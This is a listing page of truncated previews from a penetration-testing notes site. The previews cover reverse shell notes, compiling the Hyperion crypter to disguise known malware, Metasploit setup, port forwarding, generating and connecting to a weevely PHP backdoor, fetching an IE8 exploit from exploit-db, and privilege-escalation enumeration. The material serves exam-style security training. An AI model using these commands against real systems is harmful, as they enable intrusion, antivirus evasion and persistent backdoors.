Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...


Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
Legal
The megacorpone.com Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The EssentiaTools
...


Score: 0




Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...


Score: 0




See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit

MetaSploit requires Postfresql

systemctl start postgresql

To enabl...


Score: 1




Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...


Score: 0




AES Decryption
http://aesencryption.net/

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
done

Or convert html to word ...


Score: 0




Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

...


Score: 0


Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells
http://www....


Score: 0


Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

whoami

net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.

...


Score: 0


Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su

Here are the commands I have learned to use to perform linux enumeration and privledge escal...


Score: 0